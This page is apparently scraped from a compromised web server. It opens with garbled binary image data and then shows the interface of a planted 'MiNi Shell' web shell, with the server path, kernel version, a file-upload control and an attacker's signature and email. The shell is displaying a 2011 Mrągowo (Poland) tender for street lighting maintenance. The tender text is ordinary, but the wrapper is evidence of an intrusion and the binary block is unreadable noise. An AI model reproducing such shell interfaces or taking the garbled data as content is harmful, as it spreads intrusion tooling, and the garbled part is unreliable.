JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110105/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110105/6129-N-2011.html

<p class="kh_header"><b>Mrągowo: Konserwacja oświetlenia ulicznego i parkowego na terenie miasta Mrągowo</b><br>
<b>Numer ogłoszenia: 6129 - 2011; data zamieszczenia: 05.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Mrągowo , ul. Królewiecka 60A, 11-700 Mrągowo, woj. warmińsko-mazurskie, tel. 89 74190 00, faks 89 7412874.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mragowo.um.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Konserwacja oświetlenia ulicznego i parkowego na terenie miasta Mrągowo.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Do obowiązków Wykonawcy należy:
1.	Sprawowanie nadzoru nad oświetleniem ulicznym, obejmującego:
a/ Dokonywanie raz na 2 tygodnie oględzin oświetlenia ulicznego, w celu wykrywania uszkodzeń mechanicznych i awarii oraz aktów wandalizmu na oświetleniu ulicznym. Sporządzanie protokołu oględzin i oceny stanu technicznego, w oparciu o który dokonywana będzie konserwacja poszczególnych urządzeń oraz przekazywanie informacji z oględzin drogą elektroniczną lub pismem na adres Zamawiającego.
b/ Dokonywanie oględzin sieci oświetlenia ulicznego oraz punktów pomiarowo - rozdzielczych raz na kwartał. Sporządzanie protokołu oględzin i oceny stanu technicznego w oparciu, o który dokonywana będzie konserwacja poszczególnych urządzeń oraz przekazywanie informacji z oględzin drogą elektroniczną lub pismem na adres Zamawiającego.
c/ Naprawę uszkodzonych: styków, połączeń, przewodów w oprawach i słupach, wnęk bezpiecznikowych, końcówek kabli, itp.
d/ Wymianę uszkodzonych: bezpieczników, styczników, fotorezystorów, źródeł światła (rtęciowych na energooszczędne źródła światła sodowe), przekaźników zmierzchowych, opraw, wysięgników, słupów itp. urządzeń oświetlenia ulicznego i parkowego.
e/ Utrzymanie w należytym stanie opraw oświetleniowych ( utrzymanie w czystości kloszy 
i odbłyśników). Czyszczenie raz w miesiącu - w okresie od 01 maja do 31 sierpnia - opraw łącznie z kloszami, słupów oświetlenia parkowego.
f/ Konserwację szafek kablowych, oświetleniowych, tablic oświetleniowych w stacjach.
g/ Lokalizację oraz awaryjną naprawę uszkodzonych odcinków kabli sterujących i oświetleniowych - czas reakcji do 5 godzin od stwierdzenia lub zgłoszenia.
h/ Sprawdzanie układów zapłonowych opraw.
i/ Ustalanie przyczyn awarii na oświetleniu objętym gwarancją oraz kontrolę realizacji usterek gwarancyjnych.
j/ Wykonywanie pomiarów ochronnych w zakresie skuteczności:
- ochrony przeciwporażeniowej,
- rezystancji izolacji przewodów, kabli i urządzeń elektrycznych będących pod napięciem. Czynności wykonywać zgodnie z zakresem i czasokresem normatywnym. Stosowną dokumentację i protokołu przekazywać Zamawiającemu.
k/ Sprawdzanie poziomu hałasu i drgań źródeł światła.
l/ Sprawdzanie wskazań aparatury kontrolno-pomiarowej.
ł/ Ustawianie i regulację przekaźników zmierzchowych.
2.	Usuwanie skutków wandalizmu i skutków wypadków drogowych, tj. uzupełnianie brakujących lub zdewastowanych: kloszy, opraw, wysięgników, słupów, układów sterowniczych, kabli oświetleniowych zasilających i sterowniczych, szafek, zamków i zamknięć, tablic oświetleniowych itp. urządzeń oświetlenia ulicznego i parkowego (po uprzednim zgłoszeniu do Policji i UM), likwidacja zagrożeń dla osób trzecich - czas reakcji -niezwłocznie do 2 godzin od stwierdzenia lub zgłoszenia.
3.	W przypadku wykrycia sprawcy wypadku drogowego czego skutkiem było zniszczenie, bądź uszkodzenie o którym mowa w pkt. 2, Wykonawca prowadzi postępowanie w sprawie pokrycia kosztów z ubezpieczenia sprawcy a przysługująca należność stanowi dochód Wykonawcy.
4.	Zapewnienie 24 - godzinnego Pogotowia Energetycznego w czasie trwania masowych imprez (typu Piknik Country, Festiwal Kultury Kresowej, itp.) organizowanych przez Urząd Miasta Mrągowo.
5.	Przegląd techniczny i doprowadzenie do sprawności 65 gniazd elektrycznych do iluminacji świątecznej, w terminie do 20 listopada 2011 r.
6.	Montaż dodatkowych gniazd elektrycznych do iluminacji świątecznej wg wskazań Zamawiającego wraz z konserwacją i utrzymaniem w sprawności w okresie trwania umowy - do 20 szt.
7.	Demontaż (do 05.02.2011 r.) i montaż (do 01.12.2011 r.) 65 elementów słupowych iluminacji świątecznej, 3 balkonowych, 2 liniowych nad jezdnią, dekoracja 3 drzew z elementów będących własnością Zamawiającego, bieżąca naprawa, utrzymanie w sprawności, w okresie wywieszenia. 
8.	Montaż dodatkowych elementów iluminacji świątecznej z bieżącą naprawą i utrzymaniem w sprawności, wg wskazań zamawiającego - do 20 szt.
9.	Realizację warunków ENERGI-Operatora S.A. Oddział w Olsztynie, jako właściciela urządzeń oświetlenia ulicznego, tzn.:
a/ Wykonawca będzie przestrzegał warunki ujęte w niżej wymienionych instrukcjach
    -Instrukcji Współpracy Ruchowej,
- Instrukcji Organizacji Bezpiecznej Pracy przy urządzeniach i instalacjach elektroenergetycznych, wraz z załącznikami marzec 2008 r., 
- Instrukcji stanowiska prac pod napięciem do 1 kV, styczeń 2009 roku, 
- Instrukcji prac pod napięciem przy elektroenergetycznych liniach napowietrznych
 i kablowych oraz urządzeniach rozdzielczych do 1 kV, grudzień 2008 roku.
b/ Eksploatacja musi obejmować całość urządzeń oświetlenia drogowego, zarówno wydzielonego, jak i podwieszonego na wspólnych konstrukcjach z siecią zasilającą E-O S.A., tj. układy sterowniczo-pomiarowe, kable oświetleniowe zasilające i sterownicze, szafki, zamki, zamknięcia, tablice oświetleniowe, oprawy i słupy oświetleniowe.
c/ Eksploatacja, naprawa i modernizacja urządzeń oświetlenia drogowego musi odbywać się bez wyłączeń urządzeń i linii zasilających, techniką Prac Pod Napięciem (PPN) do 1 kV, zgodnie z Zasadami wykonywania prac pod napięciem (Załącznik nr 2 do Instrukcji Współpracy Ruchowej), zawartymi pomiędzy RE Kętrzyn, a Wykonawcą.
d/ W wyjątkowych sytuacjach (brak technologii PPN) dopuszcza się prace na urządzeniach wyłączonych spod napięcia, w oparciu o warunki ujęte w ppkt: e/, f/, g/, h/ oraz i/.
e/ Złożenie w ZE pisemnego wniosku na 7 dni roboczych przed planowanym wyłączeniem.
f/ Koszty niesprzedanej przez E-O S.A. energii, wynikłe z wyłączenia sieci, pokrywa Wykonawca. Wielkość niesprzedanej energii ustalona zostanie jako średnia, na podstawie pomiarów napięcia prądu tuż przed wyłączeniem i bezpośrednio po załączeniu linii, z zastosowaniem współczynnika 0,2 dla kwoty wyliczonej jak dla grupy taryfowej C11, wg Taryfy dla energii elektrycznej obowiązującej odbiorców obsługiwanych przez Energę -Obrót S.A. z siedzibą w Olsztynie, zatwierdzonej Decyzją Prezesa Urzędu Regulacji Energetyki w dniu wyłączenia. Rejon Energetyczny pobierał będzie od Wykonawcy opłaty    za dopuszczenie do pracy wg stawek obowiązujących w danym dniu. Należność będzie pobierana po zakończeniu pracy (wg zatwierdzonego Cennika opłat dodatkowych obowiązującego w E-O S.A. w Olsztynie).
g/ Eksploatacja na terenie miasta Mrągowa musi być prowadzona ciągami liniowymi, w celu wyeliminowania niepotrzebnych przerw w dostawie energii elektrycznej odbiorcom, z każdorazowym dopuszczeniem do prac na poszczególnych ciągach.
h/ Polecenia na pracę będą wystawiane przez Rejon Energetyczny Kętrzyn.
i/ W porozumieniu z Posterunkiem Energetycznym Mrągowo, powiadamianie odbiorców o przerwach w dostawie energii na co najmniej 5 dni przed terminem planowanej pracy, z podaniem daty i czasu trwania wyłączenia.
j/ Pokrycie kosztów niesprzedanej przez E-O S.A. w Olsztynie energii, z powodu wyłączenia sieci dla potrzeb konserwacji oświetlenia.
k/ Organizowanie i wykonywanie prac eksploatacyjnych zgodnie z obowiązującymi przepisami eksploatacji urządzeń elektroenergetycznych, kwalifikacji personelu oraz BHP, w tym również instrukcji wymienionych w pkt.9, ppkt. a oraz przepisów zawartych w rozporządzeniu Ministra Gospodarki z dnia 17 września 1999 r. w sprawie bezpieczeństwa i higieny pracy przy urządzeniach i instalacjach energetycznych (Dz. U. Nr 80, poz. 912).
l/ Informowanie RE Kętrzyn o zdemontowanych urządzeniach i oprawach oświetleniowych oraz przekazywanie ich do Posterunku Energetycznego w Mrągowie.
ł/ Pokrywanie kosztów utylizacji zużytych lamp, zawarcie umowy na odbiór odpadów niebezpiecznych i uzyskanie pozwolenia na ich zagospodarowanie.
10. Całodobowe przyjmowanie i rejestrowanie zgłoszeń dotyczących funkcjonowania oświetlenia (prowadzenie książki zgłoszeń obejmującej obszar Miasta Mrągowo administrowany przez Zamawiającego - do wglądu Zamawiającemu ).
11. Stała kontrola świecenia całości oświetlenia. Kontrolowanie raz w miesiącu (do 15 każdego miesiąca) oświetlenia ulicznego na terenie miasta w porze nocnej, po zaświeceniu się lamp ulicznych i sporządzeniu na tę okoliczność stosownych notatek oraz przedstawienia ich zamawiającemu faksem lub e-mailem: nr faksu: 89-741-28-74, e-mail: gkm@mragowo.um.gov.pl.
12. Współpraca z Zamawiającym w celu usprawnienia funkcjonowania oświetlenia.
13. Czas usuwania usterek/awarii:
a) nieświecenie pojedynczych lamp: do 24 godzin od stwierdzenia lub zgłoszenia,
b) nieuzasadnione świecenie się lamp w dzień lub wyłączenie się obwodu zasilającego źródła światła: do 5 godzin od stwierdzenia lub zgłoszenia.
14. Wykonawca zobowiązany jest do niezwłocznego pisemnego powiadomienia Zamawiającego o niemożności usunięcia awarii sieci oświetleniowej w terminie zgodnym z zawartą umową 
i ustalenia z Zamawiającym nowego terminu naprawy.
15. Dokonywania napraw urządzeń oświetlenia ulicznego i parkowego przy użyciu odpowiedniego sprzętu specjalistycznego (podnośniki samochodowe dopuszczone do pracy pod napięciem), zgodnie z harmonogramem przygotowanym w oparciu o protokół z oględzin.
16. Informowanie pozostałych właścicieli oświetlenia o planowanych pracach z co najmniej 2 dniowym wyprzedzeniem.
17. Utrzymanie w sprawności użytkowej i technicznej instalacji i urządzeń podświetleń - iluminacji obiektów zabytkowych i pomników.
18. Dokonywanie okresowych podcinek drzewostanu w strefie oświetlenia ulicznego i parkowego po przeprowadzonych przeglądach w następujących miesiącach: luty-marzec, październik-listopad, zgodnie ze sporządzonym protokołem konieczności, zatwierdzonym przez zamawiającego.
19. Wszelkie konieczne zmiany systemu sterowania oświetleniem przyjętego do konserwacji oraz sposobu zasilania, zrealizowane przez Wykonawcę w czasie trwania umowy, muszą być opisane i przekazane Zamawiającemu niezwłocznie po ich dokonaniu.
20. Konserwowanie oświetlenia i wykonywanie innych prac związanych z utrzymaniem świetlenia ulicznego i parkowego, niezależnie od zapisów niniejszej umowy zgodnie z obowiązującymi w tym zakresie przepisami..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Jeżeli w toku realizacji umowy zwiększy się ilość punktów świetlnych powyżej 1% (w związku z budową lub rozbudową), Zamawiający przewiduje udzielenie zamówienia uzupełniającego zgodnego z zakresem zamówienia głównego na dodatkowe punkty świetlne, na zasadach określonych w art. 67 ust. 1 pkt 6 ustawy Pzp</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.23.21.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie:
1. Oświadczenie.

Zamawiający dokona oceny spełnienia warunku na podstawie złożonych dokumentów na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie:
1. Oświadczenie.

Zamawiający dokona oceny spełnienia warunku na podstawie złożonych dokumentów na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie:
1. Oświadczenie.
2. Wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami. Spełnieniem tego warunku będzie dysponowanie co najmniej: 
- dwoma podnośnikami montażowymi z koszem izolowanym do 1kV dopuszczonym do pracy pod napięciem, oznakowanym sygnałem świetlnym z czego jeden o ciężarze całkowitym do 3,5 tony, wysięgu bocznym min. 12 m przy równoczesnym zasięgu w pionie min. 12 m.
- samochodem pogotowia do 3,5t wyposażonym w środki łączności, oznakowanym sygnałem świetlnym.
- profesjonalnym zestawem do lokalizacji tras linii kablowych oraz lokalizacji uszkodzeń zewnętrznej powłoki kabli energetycznych metodą niskonapięciową nieniszczącą

Zamawiający dokona oceny spełnienia warunku na podstawie złożonych dokumentów na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie:
1. Oświadczenie.
2. Wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacje o podstawie dysponowania tymi osobami. Spełnieniem tego warunku będzie dysponowanie min. 4 pracownikami posiadającymi uprawnienia elektryczne -SEP gr. E do 1kV i uprawnienia do prac pod napięciem, pracownikiem przeszkolonym do lokalizacji uszkodzeń linii kablowych, 2 pracownikami z uprawnieniami do obsługi podnośnika koszowego wydanymi przez Urząd Dozoru Technicznego.

Zamawiający dokona oceny spełnienia warunku na podstawie złożonych dokumentów na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie:
1. Oświadczenie.

Zamawiający dokona oceny spełnienia warunku na podstawie złożonych dokumentów na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w następującym zakresie:
1. Wynagrodzenie Wykonawcy określone w umowie może ulec zmianom w następujących przypadkach:
- zmiana stawki urzędowej podatku VAT,
- wykonanie prac zamiennych - o wartość tych prac,
- rezygnacji z części prac, jeśli taka rezygnacja będzie niezbędna do prawidłowej realizacji przedmiotu umowy - o wartość niewykonanych prac.
2. Inne zmiany:
a) w zakresie podwykonawstwa za uprzednią zgodą Zamawiającego:
- powierzenie podwykonawcom innej części prac niż wskazana w ofercie Wykonawcy o ile nie sprzeciwia się to postanowieniom SIWZ.
3. Warunki zmian:
- inicjowanie zmian - na wniosek wykonawcy lub zamawiającego,
- uzasadnienie zmian - prawidłowa realizacji przedmiotu umowy, obniżenie kosztów,
- forma zmian - aneks do umowy w formie pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.mragowo.um.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Mrągowie, ul. Królewiecka 60A, 11-700 Mrągowo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.01.2011 godzina 10:30, miejsce: Urząd Miejski w Mrągowie, ul. Królewiecka 60A, 11-700 Mrągowo.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com